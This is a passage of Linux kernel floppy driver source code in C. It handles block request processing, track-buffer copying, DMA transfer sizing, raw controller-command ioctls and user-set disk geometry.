_floppy->track > DP->tracks ||
tmp_format_req->track >= _floppy->track ||
tmp_format_req->head >= _floppy->head ||
(_floppy->sect << 2) % (1 << FD_SIZECODE(_floppy)) ||
!_floppy->fmt_gap) {
process_fd_request();
return -EINVAL;
}
format_req = *tmp_format_req;
format_errors = 0;
cont = &format_cont;
errors = &format_errors;
ret = wait_til_done(redo_format, true);
if (ret == -EINTR)
return -EINTR;
process_fd_request();
return ret;
}
/*
* Buffer read/write and support
* =============================
*/
static void floppy_end_request(struct request *req, blk_status_t error)
{
unsigned int nr_sectors = current_count_sectors;
unsigned int drive = (unsigned long)req->rq_disk->private_data;
/* current_count_sectors can be zero if transfer failed */
if (error)
nr_sectors = blk_rq_cur_sectors(req);
if (blk_update_request(req, error, nr_sectors << 9))
return;
__blk_mq_end_request(req, error);
/* We're done with the request */
floppy_off(drive);
current_req = NULL;
}
/* new request_done. Can handle physical sectors which are smaller than a
* logical buffer */
static void request_done(int uptodate)
{
struct request *req = current_req;
int block;
char msg[sizeof("request done ") + sizeof(int) * 3];
probing = 0;
snprintf(msg, sizeof(msg), "request done %d", uptodate);
reschedule_timeout(MAXTIMEOUT, msg);
if (!req) {
pr_info("floppy.c: no request in request_done\n");
return;
}
if (uptodate) {
/* maintain values for invalidation on geometry
* change */
block = current_count_sectors + blk_rq_pos(req);
INFBOUND(DRS->maxblock, block);
if (block > _floppy->sect)
DRS->maxtrack = 1;
floppy_end_request(req, 0);
} else {
if (rq_data_dir(req) == WRITE) {
/* record write error information */
DRWE->write_errors++;
if (DRWE->write_errors == 1) {
DRWE->first_error_sector = blk_rq_pos(req);
DRWE->first_error_generation = DRS->generation;
}
DRWE->last_error_sector = blk_rq_pos(req);
DRWE->last_error_generation = DRS->generation;
}
floppy_end_request(req, BLK_STS_IOERR);
}
}
/* Interrupt handler evaluating the result of the r/w operation */
static void rw_interrupt(void)
{
int eoc;
int ssize;
int heads;
int nr_sectors;
if (R_HEAD >= 2) {
/* some Toshiba floppy controllers occasionally seem to
* return bogus interrupts after read/write operations, which
* can be recognized by a bad head number (>= 2) */
return;
}
if (!DRS->first_read_date)
DRS->first_read_date = jiffies;
nr_sectors = 0;
ssize = DIV_ROUND_UP(1 << SIZECODE, 4);
if (ST1 & ST1_EOC)
eoc = 1;
else
eoc = 0;
if (COMMAND & 0x80)
heads = 2;
else
heads = 1;
nr_sectors = (((R_TRACK - TRACK) * heads +
R_HEAD - HEAD) * SECT_PER_TRACK +
R_SECTOR - SECTOR + eoc) << SIZECODE >> 2;
if (nr_sectors / ssize >
DIV_ROUND_UP(in_sector_offset + current_count_sectors, ssize)) {
DPRINT("long rw: %x instead of %lx\n",
nr_sectors, current_count_sectors);
pr_info("rs=%d s=%d\n", R_SECTOR, SECTOR);
pr_info("rh=%d h=%d\n", R_HEAD, HEAD);
pr_info("rt=%d t=%d\n", R_TRACK, TRACK);
pr_info("heads=%d eoc=%d\n", heads, eoc);
pr_info("spt=%d st=%d ss=%d\n",
SECT_PER_TRACK, fsector_t, ssize);
pr_info("in_sector_offset=%d\n", in_sector_offset);
}
nr_sectors -= in_sector_offset;
INFBOUND(nr_sectors, 0);
SUPBOUND(current_count_sectors, nr_sectors);
switch (interpret_errors()) {
case 2:
cont->redo();
return;
case 1:
if (!current_count_sectors) {
cont->error();
cont->redo();
return;
}
break;
case 0:
if (!current_count_sectors) {
cont->redo();
return;
}
current_type[current_drive] = _floppy;
floppy_sizes[TOMINOR(current_drive)] = _floppy->size;
break;
}
if (probing) {
if (DP->flags & FTD_MSG)
DPRINT("Auto-detected floppy type %s in fd%d\n",
_floppy->name, current_drive);
current_type[current_drive] = _floppy;
floppy_sizes[TOMINOR(current_drive)] = _floppy->size;
probing = 0;
}
if (CT(COMMAND) != FD_READ ||
raw_cmd->kernel_data == bio_data(current_req->bio)) {
/* transfer directly from buffer */
cont->done(1);
} else if (CT(COMMAND) == FD_READ) {
buffer_track = raw_cmd->track;
buffer_drive = current_drive;
INFBOUND(buffer_max, nr_sectors + fsector_t);
}
cont->redo();
}
/* Compute maximal contiguous buffer size. */
static int buffer_chain_size(void)
{
struct bio_vec bv;
int size;
struct req_iterator iter;
char *base;
base = bio_data(current_req->bio);
size = 0;
rq_for_each_segment(bv, current_req, iter) {
if (page_address(bv.bv_page) + bv.bv_offset != base + size)
break;
size += bv.bv_len;
}
return size >> 9;
}
/* Compute the maximal transfer size */
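/* Note: as a side effect, current_count_sectors is set to the length of
 * the resulting transfer (in 512-byte sectors). */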
static int transfer_size(int ssize, int max_sector, int max_size)
{
SUPBOUND(max_sector, fsector_t + max_size);
/* alignment */
max_sector -= (max_sector % _floppy->sect) % ssize;
/* transfer size, beginning not aligned */
current_count_sectors = max_sector - fsector_t;
return max_sector;
}
/*
* Move data from/to the track buffer to/from the buffer cache.
*/
static void copy_buffer(int ssize, int max_sector, int max_sector_2)
{
int remaining; /* number of transferred 512-byte sectors */
struct bio_vec bv;
char *buffer;
char *dma_buffer;
int size;
struct req_iterator iter;
max_sector = transfer_size(ssize,
min(max_sector, max_sector_2),
blk_rq_sectors(current_req));
if (current_count_sectors <= 0 && CT(COMMAND) == FD_WRITE &&
buffer_max > fsector_t + blk_rq_sectors(current_req))
current_count_sectors = min_t(int, buffer_max - fsector_t,
blk_rq_sectors(current_req));
remaining = current_count_sectors << 9;
if (remaining > blk_rq_bytes(current_req) && CT(COMMAND) == FD_WRITE) {
DPRINT("in copy buffer\n");
pr_info("current_count_sectors=%ld\n", current_count_sectors);
pr_info("remaining=%d\n", remaining >> 9);
pr_info("current_req->nr_sectors=%u\n",
blk_rq_sectors(current_req));
pr_info("current_req->current_nr_sectors=%u\n",
blk_rq_cur_sectors(current_req));
pr_info("max_sector=%d\n", max_sector);
pr_info("ssize=%d\n", ssize);
}
buffer_max = max(max_sector, buffer_max);
dma_buffer = floppy_track_buffer + ((fsector_t - buffer_min) << 9);
size = blk_rq_cur_bytes(current_req);
rq_for_each_segment(bv, current_req, iter) {
if (!remaining)
break;
size = bv.bv_len;
SUPBOUND(size, remaining);
buffer = page_address(bv.bv_page) + bv.bv_offset;
if (dma_buffer + size >
floppy_track_buffer + (max_buffer_sectors << 10) ||
dma_buffer < floppy_track_buffer) {
DPRINT("buffer overrun in copy buffer %d\n",
(int)((floppy_track_buffer - dma_buffer) >> 9));
pr_info("fsector_t=%d buffer_min=%d\n",
fsector_t, buffer_min);
pr_info("current_count_sectors=%ld\n",
current_count_sectors);
if (CT(COMMAND) == FD_READ)
pr_info("read\n");
if (CT(COMMAND) == FD_WRITE)
pr_info("write\n");
break;
}
if (((unsigned long)buffer) % 512)
DPRINT("%p buffer not aligned\n", buffer);
if (CT(COMMAND) == FD_READ)
memcpy(buffer, dma_buffer, size);
else
memcpy(dma_buffer, buffer, size);
remaining -= size;
dma_buffer += size;
}
if (remaining) {
if (remaining > 0)
max_sector -= remaining >> 9;
DPRINT("weirdness: remaining %d\n", remaining >> 9);
}
}
/* work around a bug in pseudo DMA
* (on some FDCs) pseudo DMA does not stop when the CPU stops
* sending data. Hence we need a different way to signal the
* transfer length: We use SECT_PER_TRACK. Unfortunately, this
* does not work with MT, hence we can only transfer one head at
* a time
*/
static void virtualdmabug_workaround(void)
{
int hard_sectors;
int end_sector;
if (CT(COMMAND) == FD_WRITE) {
COMMAND &= ~0x80; /* switch off multiple track mode */
hard_sectors = raw_cmd->length >> (7 + SIZECODE);
end_sector = SECTOR + hard_sectors - 1;
if (end_sector > SECT_PER_TRACK) {
pr_info("too many sectors %d > %d\n",
end_sector, SECT_PER_TRACK);
return;
}
SECT_PER_TRACK = end_sector;
/* make sure SECT_PER_TRACK
* points to end of transfer */
}
}
/*
* Formulate a read/write request.
 * This routine decides where to load the data (directly to buffer, or to
* tmp floppy area), how much data to load (the size of the buffer, the whole
* track, or a single sector)
* All floppy_track_buffer handling goes in here. If we ever add track buffer
* allocation on the fly, it should be done here. No other part should need
* modification.
*/
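/*
 * Return values: 0 means the request could not be set up (it is then
 * failed via request_done(0)), 1 means the request was satisfied without
 * issuing a controller command (e.g. a read hit in the track buffer),
 * and 2 means raw_cmd has been filled in and should be sent to the FDC.
 */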
static int make_raw_rw_request(void)
{
int aligned_sector_t;
int max_sector;
int max_size;
int tracksize;
int ssize;
if (WARN(max_buffer_sectors == 0, "VFS: Block I/O scheduled on unopened device\n"))
return 0;
set_fdc((long)current_req->rq_disk->private_data);
raw_cmd = &default_raw_cmd;
raw_cmd->flags = FD_RAW_SPIN | FD_RAW_NEED_DISK | FD_RAW_NEED_SEEK;
raw_cmd->cmd_count = NR_RW;
if (rq_data_dir(current_req) == READ) {
raw_cmd->flags |= FD_RAW_READ;
COMMAND = FM_MODE(_floppy, FD_READ);
} else if (rq_data_dir(current_req) == WRITE) {
raw_cmd->flags |= FD_RAW_WRITE;
COMMAND = FM_MODE(_floppy, FD_WRITE);
} else {
DPRINT("%s: unknown command\n", __func__);
return 0;
}
max_sector = _floppy->sect * _floppy->head;
TRACK = (int)blk_rq_pos(current_req) / max_sector;
fsector_t = (int)blk_rq_pos(current_req) % max_sector;
if (_floppy->track && TRACK >= _floppy->track) {
if (blk_rq_cur_sectors(current_req) & 1) {
current_count_sectors = 1;
return 1;
} else
return 0;
}
HEAD = fsector_t / _floppy->sect;
if (((_floppy->stretch & (FD_SWAPSIDES | FD_SECTBASEMASK)) ||
test_bit(FD_NEED_TWADDLE_BIT, &DRS->flags)) &&
fsector_t < _floppy->sect)
max_sector = _floppy->sect;
/* 2M disks have phantom sectors on the first track */
if ((_floppy->rate & FD_2M) && (!TRACK) && (!HEAD)) {
max_sector = 2 * _floppy->sect / 3;
if (fsector_t >= max_sector) {
current_count_sectors =
min_t(int, _floppy->sect - fsector_t,
blk_rq_sectors(current_req));
return 1;
}
SIZECODE = 2;
} else
SIZECODE = FD_SIZECODE(_floppy);
raw_cmd->rate = _floppy->rate & 0x43;
if ((_floppy->rate & FD_2M) && (TRACK || HEAD) && raw_cmd->rate == 2)
raw_cmd->rate = 1;
if (SIZECODE)
SIZECODE2 = 0xff;
else
SIZECODE2 = 0x80;
raw_cmd->track = TRACK << STRETCH(_floppy);
DR_SELECT = UNIT(current_drive) + PH_HEAD(_floppy, HEAD);
GAP = _floppy->gap;
ssize = DIV_ROUND_UP(1 << SIZECODE, 4);
SECT_PER_TRACK = _floppy->sect << 2 >> SIZECODE;
SECTOR = ((fsector_t % _floppy->sect) << 2 >> SIZECODE) +
FD_SECTBASE(_floppy);
/* tracksize describes the size which can be filled up with sectors
* of size ssize.
*/
tracksize = _floppy->sect - _floppy->sect % ssize;
if (tracksize < _floppy->sect) {
SECT_PER_TRACK++;
if (tracksize <= fsector_t % _floppy->sect)
SECTOR--;
/* if we are beyond tracksize, fill up using smaller sectors */
while (tracksize <= fsector_t % _floppy->sect) {
while (tracksize + ssize > _floppy->sect) {
SIZECODE--;
ssize >>= 1;
}
SECTOR++;
SECT_PER_TRACK++;
tracksize += ssize;
}
max_sector = HEAD * _floppy->sect + tracksize;
} else if (!TRACK && !HEAD && !(_floppy->rate & FD_2M) && probing) {
max_sector = _floppy->sect;
} else if (!HEAD && CT(COMMAND) == FD_WRITE) {
/* for virtual DMA bug workaround */
max_sector = _floppy->sect;
}
in_sector_offset = (fsector_t % _floppy->sect) % ssize;
aligned_sector_t = fsector_t - in_sector_offset;
max_size = blk_rq_sectors(current_req);
if ((raw_cmd->track == buffer_track) &&
(current_drive == buffer_drive) &&
(fsector_t >= buffer_min) && (fsector_t < buffer_max)) {
/* data already in track buffer */
if (CT(COMMAND) == FD_READ) {
copy_buffer(1, max_sector, buffer_max);
return 1;
}
} else if (in_sector_offset || blk_rq_sectors(current_req) < ssize) {
if (CT(COMMAND) == FD_WRITE) {
unsigned int sectors;
sectors = fsector_t + blk_rq_sectors(current_req);
if (sectors > ssize && sectors < ssize + ssize)
max_size = ssize + ssize;
else
max_size = ssize;
}
raw_cmd->flags &= ~FD_RAW_WRITE;
raw_cmd->flags |= FD_RAW_READ;
COMMAND = FM_MODE(_floppy, FD_READ);
} else if ((unsigned long)bio_data(current_req->bio) < MAX_DMA_ADDRESS) {
unsigned long dma_limit;
int direct, indirect;
indirect =
transfer_size(ssize, max_sector,
max_buffer_sectors * 2) - fsector_t;
/*
* Do NOT use minimum() here---MAX_DMA_ADDRESS is 64 bits wide
* on a 64 bit machine!
*/
max_size = buffer_chain_size();
dma_limit = (MAX_DMA_ADDRESS -
((unsigned long)bio_data(current_req->bio))) >> 9;
if ((unsigned long)max_size > dma_limit)
max_size = dma_limit;
/* 64 kb boundaries */
if (CROSS_64KB(bio_data(current_req->bio), max_size << 9))
max_size = (K_64 -
((unsigned long)bio_data(current_req->bio)) %
K_64) >> 9;
direct = transfer_size(ssize, max_sector, max_size) - fsector_t;
/*
* We try to read tracks, but if we get too many errors, we
* go back to reading just one sector at a time.
*
* This means we should be able to read a sector even if there
* are other bad sectors on this track.
*/
if (!direct ||
(indirect * 2 > direct * 3 &&
*errors < DP->max_errors.read_track &&
((!probing ||
(DP->read_track & (1 << DRS->probed_format)))))) {
max_size = blk_rq_sectors(current_req);
} else {
raw_cmd->kernel_data = bio_data(current_req->bio);
raw_cmd->length = current_count_sectors << 9;
if (raw_cmd->length == 0) {
DPRINT("%s: zero dma transfer attempted\n", __func__);
DPRINT("indirect=%d direct=%d fsector_t=%d\n",
indirect, direct, fsector_t);
return 0;
}
virtualdmabug_workaround();
return 2;
}
}
if (CT(COMMAND) == FD_READ)
max_size = max_sector; /* unbounded */
/* claim buffer track if needed */
if (buffer_track != raw_cmd->track || /* bad track */
buffer_drive != current_drive || /* bad drive */
fsector_t > buffer_max ||
fsector_t < buffer_min ||
((CT(COMMAND) == FD_READ ||
(!in_sector_offset && blk_rq_sectors(current_req) >= ssize)) &&
max_sector > 2 * max_buffer_sectors + buffer_min &&
max_size + fsector_t > 2 * max_buffer_sectors + buffer_min)) {
/* not enough space */
buffer_track = -1;
buffer_drive = current_drive;
buffer_max = buffer_min = aligned_sector_t;
}
raw_cmd->kernel_data = floppy_track_buffer +
((aligned_sector_t - buffer_min) << 9);
if (CT(COMMAND) == FD_WRITE) {
/* copy write buffer to track buffer.
* if we get here, we know that the write
* is either aligned or the data already in the buffer
* (buffer will be overwritten) */
if (in_sector_offset && buffer_track == -1)
DPRINT("internal error offset !=0 on write\n");
buffer_track = raw_cmd->track;
buffer_drive = current_drive;
copy_buffer(ssize, max_sector,
2 * max_buffer_sectors + buffer_min);
} else
transfer_size(ssize, max_sector,
2 * max_buffer_sectors + buffer_min -
aligned_sector_t);
/* round up current_count_sectors to get dma xfer size */
raw_cmd->length = in_sector_offset + current_count_sectors;
raw_cmd->length = ((raw_cmd->length - 1) | (ssize - 1)) + 1;
raw_cmd->length <<= 9;
if ((raw_cmd->length < current_count_sectors << 9) ||
(raw_cmd->kernel_data != bio_data(current_req->bio) &&
CT(COMMAND) == FD_WRITE &&
(aligned_sector_t + (raw_cmd->length >> 9) > buffer_max ||
aligned_sector_t < buffer_min)) ||
raw_cmd->length % (128 << SIZECODE) ||
raw_cmd->length <= 0 || current_count_sectors <= 0) {
DPRINT("fractionary current count b=%lx s=%lx\n",
raw_cmd->length, current_count_sectors);
if (raw_cmd->kernel_data != bio_data(current_req->bio))
pr_info("addr=%d, length=%ld\n",
(int)((raw_cmd->kernel_data -
floppy_track_buffer) >> 9),
current_count_sectors);
pr_info("st=%d ast=%d mse=%d msi=%d\n",
fsector_t, aligned_sector_t, max_sector, max_size);
pr_info("ssize=%x SIZECODE=%d\n", ssize, SIZECODE);
pr_info("command=%x SECTOR=%d HEAD=%d, TRACK=%d\n",
COMMAND, SECTOR, HEAD, TRACK);
pr_info("buffer drive=%d\n", buffer_drive);
pr_info("buffer track=%d\n", buffer_track);
pr_info("buffer_min=%d\n", buffer_min);
pr_info("buffer_max=%d\n", buffer_max);
return 0;
}
if (raw_cmd->kernel_data != bio_data(current_req->bio)) {
if (raw_cmd->kernel_data < floppy_track_buffer ||
current_count_sectors < 0 ||
raw_cmd->length < 0 ||
raw_cmd->kernel_data + raw_cmd->length >
floppy_track_buffer + (max_buffer_sectors << 10)) {
DPRINT("buffer overrun in schedule dma\n");
pr_info("fsector_t=%d buffer_min=%d current_count=%ld\n",
fsector_t, buffer_min, raw_cmd->length >> 9);
pr_info("current_count_sectors=%ld\n",
current_count_sectors);
if (CT(COMMAND) == FD_READ)
pr_info("read\n");
if (CT(COMMAND) == FD_WRITE)
pr_info("write\n");
return 0;
}
} else if (raw_cmd->length > blk_rq_bytes(current_req) ||
current_count_sectors > blk_rq_sectors(current_req)) {
DPRINT("buffer overrun in direct transfer\n");
return 0;
} else if (raw_cmd->length < current_count_sectors << 9) {
DPRINT("more sectors than bytes\n");
pr_info("bytes=%ld\n", raw_cmd->length >> 9);
pr_info("sectors=%ld\n", current_count_sectors);
}
if (raw_cmd->length == 0) {
DPRINT("zero dma transfer attempted from make_raw_request\n");
return 0;
}
virtualdmabug_workaround();
return 2;
}
static int set_next_request(void)
{
current_req = list_first_entry_or_null(&floppy_reqs, struct request,
queuelist);
if (current_req) {
current_req->error_count = 0;
list_del_init(&current_req->queuelist);
}
return current_req != NULL;
}
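/*
 * Main request-processing loop: pick the next queued request, spin up
 * the motor, autodetect the format if needed, and hand the resulting
 * raw command to the interrupt-driven state machine via floppy_start().
 */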
static void redo_fd_request(void)
{
int drive;
int tmp;
lastredo = jiffies;
if (current_drive < N_DRIVE)
floppy_off(current_drive);
do_request:
if (!current_req) {
int pending;
spin_lock_irq(&floppy_lock);
pending = set_next_request();
spin_unlock_irq(&floppy_lock);
if (!pending) {
do_floppy = NULL;
unlock_fdc();
return;
}
}
drive = (long)current_req->rq_disk->private_data;
set_fdc(drive);
reschedule_timeout(current_reqD, "redo fd request");
set_floppy(drive);
raw_cmd = &default_raw_cmd;
raw_cmd->flags = 0;
if (start_motor(redo_fd_request))
return;
disk_change(current_drive);
if (test_bit(current_drive, &fake_change) ||
test_bit(FD_DISK_CHANGED_BIT, &DRS->flags)) {
DPRINT("disk absent or changed during operation\n");
request_done(0);
goto do_request;
}
if (!_floppy) { /* Autodetection */
if (!probing) {
DRS->probed_format = 0;
if (next_valid_format()) {
DPRINT("no autodetectable formats\n");
_floppy = NULL;
request_done(0);
goto do_request;
}
}
probing = 1;
_floppy = floppy_type + DP->autodetect[DRS->probed_format];
} else
probing = 0;
errors = &(current_req->error_count);
tmp = make_raw_rw_request();
if (tmp < 2) {
request_done(tmp);
goto do_request;
}
if (test_bit(FD_NEED_TWADDLE_BIT, &DRS->flags))
twaddle();
schedule_bh(floppy_start);
debugt(__func__, "queue fd request");
return;
}
static const struct cont_t rw_cont = {
.interrupt = rw_interrupt,
.redo = redo_fd_request,
.error = bad_flp_intr,
.done = request_done
};
static void process_fd_request(void)
{
cont = &rw_cont;
schedule_bh(redo_fd_request);
}
static blk_status_t floppy_queue_rq(struct blk_mq_hw_ctx *hctx,
const struct blk_mq_queue_data *bd)
{
blk_mq_start_request(bd->rq);
if (WARN(max_buffer_sectors == 0,
"VFS: %s called on non-open device\n", __func__))
return BLK_STS_IOERR;
if (WARN(atomic_read(&usage_count) == 0,
"warning: usage count=0, current_req=%p sect=%ld flags=%llx\n",
current_req, (long)blk_rq_pos(current_req),
(unsigned long long) current_req->cmd_flags))
return BLK_STS_IOERR;
spin_lock_irq(&floppy_lock);
list_add_tail(&bd->rq->queuelist, &floppy_reqs);
spin_unlock_irq(&floppy_lock);
if (test_and_set_bit(0, &fdc_busy)) {
/* fdc busy, this new request will be treated when the
current one is done */
is_alive(__func__, "old request running");
return BLK_STS_OK;
}
command_status = FD_COMMAND_NONE;
__reschedule_timeout(MAXTIMEOUT, "fd_request");
set_fdc(0);
process_fd_request();
is_alive(__func__, "");
return BLK_STS_OK;
}
static const struct cont_t poll_cont = {
.interrupt = success_and_wakeup,
.redo = floppy_ready,
.error = generic_failure,
.done = generic_done
};
static int poll_drive(bool interruptible, int flag)
{
/* no auto-sense, just clear dcl */
raw_cmd = &default_raw_cmd;
raw_cmd->flags = flag;
raw_cmd->track = 0;
raw_cmd->cmd_count = 0;
cont = &poll_cont;
debug_dcl(DP->flags, "setting NEWCHANGE in poll_drive\n");
set_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
return wait_til_done(floppy_ready, interruptible);
}
/*
* User triggered reset
* ====================
*/
static void reset_intr(void)
{
pr_info("weird, reset interrupt called\n");
}
static const struct cont_t reset_cont = {
.interrupt = reset_intr,
.redo = success_and_wakeup,
.error = generic_failure,
.done = generic_done
};
static int user_reset_fdc(int drive, int arg, bool interruptible)
{
int ret;
if (lock_fdc(drive))
return -EINTR;
if (arg == FD_RESET_ALWAYS)
FDCS->reset = 1;
if (FDCS->reset) {
cont = &reset_cont;
ret = wait_til_done(reset_fdc, interruptible);
if (ret == -EINTR)
return -EINTR;
}
process_fd_request();
return 0;
}
/*
* Misc Ioctl's and support
* ========================
*/
static inline int fd_copyout(void __user *param, const void *address,
unsigned long size)
{
return copy_to_user(param, address, size) ? -EFAULT : 0;
}
static inline int fd_copyin(void __user *param, void *address,
unsigned long size)
{
return copy_from_user(address, param, size) ? -EFAULT : 0;
}
static const char *drive_name(int type, int drive)
{
struct floppy_struct *floppy;
if (type)
floppy = floppy_type + type;
else {
if (UDP->native_format)
floppy = floppy_type + UDP->native_format;
else
return "(null)";
}
if (floppy->name)
return floppy->name;
else
return "(null)";
}
/* raw commands */
static void raw_cmd_done(int flag)
{
int i;
if (!flag) {
raw_cmd->flags |= FD_RAW_FAILURE;
raw_cmd->flags |= FD_RAW_HARDFAILURE;
} else {
raw_cmd->reply_count = inr;
if (raw_cmd->reply_count > MAX_REPLIES)
raw_cmd->reply_count = 0;
for (i = 0; i < raw_cmd->reply_count; i++)
raw_cmd->reply[i] = reply_buffer[i];
if (raw_cmd->flags & (FD_RAW_READ | FD_RAW_WRITE)) {
unsigned long flags;
flags = claim_dma_lock();
raw_cmd->length = fd_get_dma_residue();
release_dma_lock(flags);
}
if ((raw_cmd->flags & FD_RAW_SOFTFAILURE) &&
(!raw_cmd->reply_count || (raw_cmd->reply[0] & 0xc0)))
raw_cmd->flags |= FD_RAW_FAILURE;
if (disk_change(current_drive))
raw_cmd->flags |= FD_RAW_DISK_CHANGE;
else
raw_cmd->flags &= ~FD_RAW_DISK_CHANGE;
if (raw_cmd->flags & FD_RAW_NO_MOTOR_AFTER)
motor_off_callback(&motor_off_timer[current_drive]);
if (raw_cmd->next &&
(!(raw_cmd->flags & FD_RAW_FAILURE) ||
!(raw_cmd->flags & FD_RAW_STOP_IF_FAILURE)) &&
((raw_cmd->flags & FD_RAW_FAILURE) ||
!(raw_cmd->flags & FD_RAW_STOP_IF_SUCCESS))) {
raw_cmd = raw_cmd->next;
return;
}
}
generic_done(flag);
}
static const struct cont_t raw_cmd_cont = {
.interrupt = success_and_wakeup,
.redo = floppy_start,
.error = generic_failure,
.done = raw_cmd_done
};
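/*
 * Copy the results of a (possibly chained) raw command back to user
 * space; for read commands the data that was DMAed into the kernel
 * buffer is copied out as well.
 */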
static int raw_cmd_copyout(int cmd, void __user *param,
struct floppy_raw_cmd *ptr)
{
int ret;
while (ptr) {
struct floppy_raw_cmd cmd = *ptr;
cmd.next = NULL;
cmd.kernel_data = NULL;
ret = copy_to_user(param, &cmd, sizeof(cmd));
if (ret)
return -EFAULT;
param += sizeof(struct floppy_raw_cmd);
if ((ptr->flags & FD_RAW_READ) && ptr->buffer_length) {
if (ptr->length >= 0 &&
ptr->length <= ptr->buffer_length) {
long length = ptr->buffer_length - ptr->length;
ret = fd_copyout(ptr->data, ptr->kernel_data,
length);
if (ret)
return ret;
}
}
ptr = ptr->next;
}
return 0;
}
static void raw_cmd_free(struct floppy_raw_cmd **ptr)
{
struct floppy_raw_cmd *next;
struct floppy_raw_cmd *this;
this = *ptr;
*ptr = NULL;
while (this) {
if (this->buffer_length) {
fd_dma_mem_free((unsigned long)this->kernel_data,
this->buffer_length);
this->buffer_length = 0;
}
next = this->next;
kfree(this);
this = next;
}
}
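/*
 * Copy a user-supplied chain of raw commands into kernel space,
 * allocating a DMA-able buffer for each read/write command.  The chain
 * is continued as long as FD_RAW_MORE is set.  On error the caller is
 * expected to free the partial chain with raw_cmd_free().
 */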
static int raw_cmd_copyin(int cmd, void __user *param,
struct floppy_raw_cmd **rcmd)
{
struct floppy_raw_cmd *ptr;
int ret;
int i;
*rcmd = NULL;
loop:
ptr = kmalloc(sizeof(struct floppy_raw_cmd), GFP_KERNEL);
if (!ptr)
return -ENOMEM;
*rcmd = ptr;
ret = copy_from_user(ptr, param, sizeof(*ptr));
ptr->next = NULL;
ptr->buffer_length = 0;
ptr->kernel_data = NULL;
if (ret)
return -EFAULT;
param += sizeof(struct floppy_raw_cmd);
if (ptr->cmd_count > 33)
/* the command may now also take up the space
* initially intended for the reply & the
* reply count. Needed for long 82078 commands
* such as RESTORE, which takes ... 17 command
* bytes. Murphy's law #137: When you reserve
* 16 bytes for a structure, you'll one day
* discover that you really need 17...
*/
return -EINVAL;
for (i = 0; i < 16; i++)
ptr->reply[i] = 0;
ptr->resultcode = 0;
if (ptr->flags & (FD_RAW_READ | FD_RAW_WRITE)) {
if (ptr->length <= 0)
return -EINVAL;
ptr->kernel_data = (char *)fd_dma_mem_alloc(ptr->length);
fallback_on_nodma_alloc(&ptr->kernel_data, ptr->length);
if (!ptr->kernel_data)
return -ENOMEM;
ptr->buffer_length = ptr->length;
}
if (ptr->flags & FD_RAW_WRITE) {
ret = fd_copyin(ptr->data, ptr->kernel_data, ptr->length);
if (ret)
return ret;
}
if (ptr->flags & FD_RAW_MORE) {
rcmd = &(ptr->next);
ptr->rate &= 0x43;
goto loop;
}
return 0;
}
static int raw_cmd_ioctl(int cmd, void __user *param)
{
struct floppy_raw_cmd *my_raw_cmd;
int drive;
int ret2;
int ret;
if (FDCS->rawcmd <= 1)
FDCS->rawcmd = 1;
for (drive = 0; drive < N_DRIVE; drive++) {
if (FDC(drive) != fdc)
continue;
if (drive == current_drive) {
if (UDRS->fd_ref > 1) {
FDCS->rawcmd = 2;
break;
}
} else if (UDRS->fd_ref) {
FDCS->rawcmd = 2;
break;
}
}
if (FDCS->reset)
return -EIO;
ret = raw_cmd_copyin(cmd, param, &my_raw_cmd);
if (ret) {
raw_cmd_free(&my_raw_cmd);
return ret;
}
raw_cmd = my_raw_cmd;
cont = &raw_cmd_cont;
ret = wait_til_done(floppy_start, true);
debug_dcl(DP->flags, "calling disk change from raw_cmd ioctl\n");
if (ret != -EINTR && FDCS->reset)
ret = -EIO;
DRS->track = NO_TRACK;
ret2 = raw_cmd_copyout(cmd, param, my_raw_cmd);
if (!ret)
ret = ret2;
raw_cmd_free(&my_raw_cmd);
return ret;
}
static int invalidate_drive(struct block_device *bdev)
{
/* invalidate the buffer track to force a reread */
set_bit((long)bdev->bd_disk->private_data, &fake_change);
process_fd_request();
check_disk_change(bdev);
return 0;
}
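/*
 * Install a user-supplied geometry: with a nonzero type this redefines
 * the global floppy_type[] entry (CAP_SYS_ADMIN only) and invalidates
 * every open drive of that type; with type 0 it updates the per-drive
 * user_params[] (FDSETPRM applies to the current disk, FDDEFPRM makes
 * the setting the new default).
 */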
static int set_geometry(unsigned int cmd, struct floppy_struct *g,
int drive, int type, struct block_device *bdev)
{
int cnt;
/* sanity checking for parameters. */
if (g->sect <= 0 ||
g->head <= 0 ||
/* check for zero in F_SECT_PER_TRACK */
(unsigned char)((g->sect << 2) >> FD_SIZECODE(g)) == 0 ||
g->track <= 0 || g->track > UDP->tracks >> STRETCH(g) ||
/* check if reserved bits are set */
(g->stretch & ~(FD_STRETCH | FD_SWAPSIDES | FD_SECTBASEMASK)) != 0)
return -EINVAL;
if (type) {
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
mutex_lock(&open_lock);
if (lock_fdc(drive)) {
mutex_unlock(&open_lock);
return -EINTR;
}
floppy_type[type] = *g;
floppy_type[type].name = "user format";
for (cnt = type << 2; cnt < (type << 2) + 4; cnt++)
floppy_sizes[cnt] = floppy_sizes[cnt + 0x80] =
floppy_type[type].size + 1;
process_fd_request();
for (cnt = 0; cnt < N_DRIVE; cnt++) {
struct block_device *bdev = opened_bdev[cnt];
if (!bdev || ITYPE(drive_state[cnt].fd_device) != type)
continue;
__invalidate_device(bdev, true);
}
mutex_unlock(&open_lock);
} else {
int oldStretch;
if (lock_fdc(drive))
return -EINTR;
if (cmd != FDDEFPRM) {
/* notice a disk change immediately, else
 * we lose our settings immediately */
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
}
oldStretch = g->stretch;
user_params[drive] = *g;
if (buffer_drive == drive)
SUPBOUND(buffer_max, user_params[drive].sect);
current_type[drive] = &user_params[drive];
floppy_sizes[drive] = user_params[drive].size;
if (cmd == FDDEFPRM)
DRS->keep_data = -1;
else
DRS->keep_data = 1;
/* invalidation. Invalidate only when needed, i.e.
* when there are already sectors in the buffer cache
* whose number will change. This is useful, because
* mtools often changes the geometry of the disk after
* looking at the boot block */
if (DRS->maxblock > user_params[drive].sect ||
DRS->maxtrack ||
((user_params[drive].sect ^ oldStretch) &
(FD_SWAPSIDES | FD_SECTBASEMASK)))
invalidate_drive(bdev);
else
process_fd_request();
}
return 0;
}
/* handle obsolete ioctl's */
static unsigned int ioctl_table[] = {
FDCLRPRM,
FDSETPRM,
FDDEFPRM,
FDGETPRM,
FDMSGON,
FDMSGOFF,
FDFMTBEG,
FDFMTTRK,
FDFMTEND,
FDSETEMSGTRESH,
FDFLUSH,
FDSETMAXERRS,
FDGETMAXERRS,
FDGETDRVTYP,
FDSETDRVPRM,
FDGETDRVPRM,
FDGETDRVSTAT,
FDPOLLDRVSTAT,
